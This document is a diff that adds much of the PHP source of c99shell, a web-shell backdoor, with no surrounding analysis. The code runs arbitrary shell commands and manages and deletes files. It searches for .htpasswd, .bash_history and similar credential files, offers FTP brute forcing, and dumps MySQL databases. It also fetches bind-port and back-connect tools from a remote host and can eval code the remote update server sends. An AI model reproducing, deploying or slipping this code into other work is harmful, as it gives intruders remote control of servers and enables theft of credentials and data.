+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"), 
+ array("<b>Tools</b>",$surl."act=tools&d=%d"), 
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"), 
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>Sec.</b>",$surl."act=security&d=%d"), 
+ array("<b>SQL</b>",$surl."act=sql&d=%d"), 
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"), 
+ array("<b>Update</b>",$surl."act=update&d=%d"), 
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"), 
+ array("<b>Self remove</b>",$surl."act=selfremove"), 
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") 
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+} 
+function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+} 
+function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+} 
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by C99Shell.SQL v. ".$shver." 
+# Home page: http://ccteam.ru 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
